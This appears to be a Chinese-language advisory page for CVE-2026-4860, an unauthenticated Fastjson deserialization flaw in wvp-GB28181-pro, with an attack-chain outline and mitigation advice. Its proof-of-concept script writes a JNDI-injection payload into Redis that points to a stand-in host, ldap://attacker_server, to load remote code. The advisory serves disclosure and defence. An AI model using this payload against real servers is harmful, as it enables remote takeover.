CVE-2026-4860 CVSS 7.3 高危

CVE-2026-4860 wvp-GB28181-pro远程反序列化漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4860

漏洞类型

反序列化漏洞

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

wvp-GB28181-pro

漏洞概述

wvp-GB28181-pro是一款基于Java的GB28181视频平台。该漏洞存在于其API Endpoint组件中的`RedisTemplateConfig.java`文件，由于使用了不安全的`GenericFastJsonRedisSerializer`进行Redis数据序列化，导致反序列化漏洞。攻击者无需认证即可远程发起攻击，通过构造恶意数据包触发反序列化，从而可能导致远程代码执行（RCE），进而控制服务器。

技术细节

该漏洞的根本原因在于wvp-GB28181-pro在配置RedisTemplate时，采用了Fastjson的`GenericFastJsonRedisSerializer`作为默认的序列化与反序列化工具。Fastjson在处理JSON数据时，如果开启了AutoType支持或存在绕过链，允许攻击者通过指定`@type`字段来加载任意Java类。攻击者可以向Redis中写入包含恶意类（如利用JNDI注入的`com.sun.rowset.JdbcRowSetImpl`）的JSON字符串。当应用程序从Redis读取该数据并尝试反序列化还原对象时，会自动加载并实例化攻击者指定的类，执行恶意代码，最终导致服务器被入侵。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是wvp-GB28181-pro且版本在2.7.4及以下。

STEP 2

漏洞利用

攻击者构造恶意的Fastjson反序列化Payload（如JNDI注入Payload）。

STEP 3

注入

攻击者通过网络将恶意Payload发送至目标系统的Redis服务，写入特定Key。

STEP 4

触发

目标wvp-GB28181-pro应用从Redis读取数据，并使用GenericFastJsonRedisSerializer进行反序列化。

STEP 5

执行

反序列化过程触发恶意类加载，攻击者获得服务器远程代码执行权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import redis

# Connect to the target Redis instance
r = redis.Redis(host='target_ip', port=6379, db=0)

# Malicious payload using Fastjson JNDI injection
# Note: This is a generic Fastjson payload structure
malicious_payload = '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker_server:1389/exploit","autoCommit":true}'

# The specific key depends on the application logic, assuming it reads a session or config key
# Attackers would need to know which key the application deserializes.
# For demonstration, we set a generic key.
r.set('vulnerable_key', malicious_payload)

print("Payload sent to Redis.")

影响范围

wvp-GB28181-pro <= 2.7.4

防御指南

临时缓解措施

如果无法立即升级，建议修改`RedisTemplateConfig.java`配置文件，将`GenericFastJsonRedisSerializer`替换为`StringRedisSerializer`或`Jackson2JsonRedisSerializer`，并重新编译部署。同时，检查Redis日志是否存在异常的外部连接请求，并在防火墙层面限制对Redis端口的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4860
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4860
3 Details https://www.cvedetails.com/cve/CVE-2026-4860/
4 VulDB https://vuldb.com/cve/CVE-2026-4860
5 Link https://github.com/wing3e/public_exp/issues/1
6 Link https://vuldb.com/?ctiid.353191
7 Link https://vuldb.com/?id.353191
8 Link https://vuldb.com/?submit.776213

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表